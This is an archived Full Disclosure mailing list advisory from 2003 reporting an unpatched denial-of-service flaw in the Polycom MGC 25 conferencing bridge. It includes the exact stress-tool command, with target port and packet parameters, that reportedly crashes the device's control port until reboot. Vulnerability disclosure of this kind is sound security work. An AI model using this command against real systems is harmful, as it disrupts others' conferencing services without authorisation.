Full Disclosure mailing list archives
DoS - Polycom MGC 25 Control Port
From: ident () boxfrog com
Date: Sat, 12 Jul 2003 15:31:27 -0500
------------------------------------------------------------------ - EXPL-A-2003-014 exploitlabs.com Advisory 014 -------------------------------------------------------------------= Polycom MGC25 =-
NutcaseJuly 12, 2003
Vunerability(s): ----------------Denial of Service
Product: -------- Polycom MGC 25 - MCU Ver: 5.51.21 Polycom MGC 25 - MCMS Ver : 5.51.211 ( current ) Polycom MGC 50 - unverifiedPolycom MGC 100 - unverified
Description of product: ----------------------- "The MGC 25 is a robust Multipoint Video and Audio bridge for organizations with a distributed network, a centralized network or both. All three platforms ( MGC-25 MGC-50 MGC-100 ) use the same software, share a common feature set and supportthe same scheduling and management solutions."
http://www.polycom.com/common/flash/individual_tours/I_MGC25.htmhttp://www.polycom.com/common/pw_item_show_doc/0,1449,853,00.pdf
VUNERABILITY / EXPLOIT====================== tested on Windows XP / 2k issuing... blast 10.10.10.10 5003 600 680 /t 7000 /d 300 /b user ( blast is a stress tool from http://www.foundstone.com/Blast ) completly crashes the control port on the remote host Box must be rebooted to return remote management functionality
Local: ------yes
Remote: -------yes
Vendor Fix: ----------- No fix on 0dayVendor has not responded
Vendor Contact: --------------- Concurrent with this advisorysecuritycenter () polycom com
Credits: -------- Nutcase id3nt () boxfrog comhttp://exploitlabs.com
exploitlabs.com and nothackers.org thanks Nutcase for his contribution
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- DoS - Polycom MGC 25 Control Port ident (Jul 12)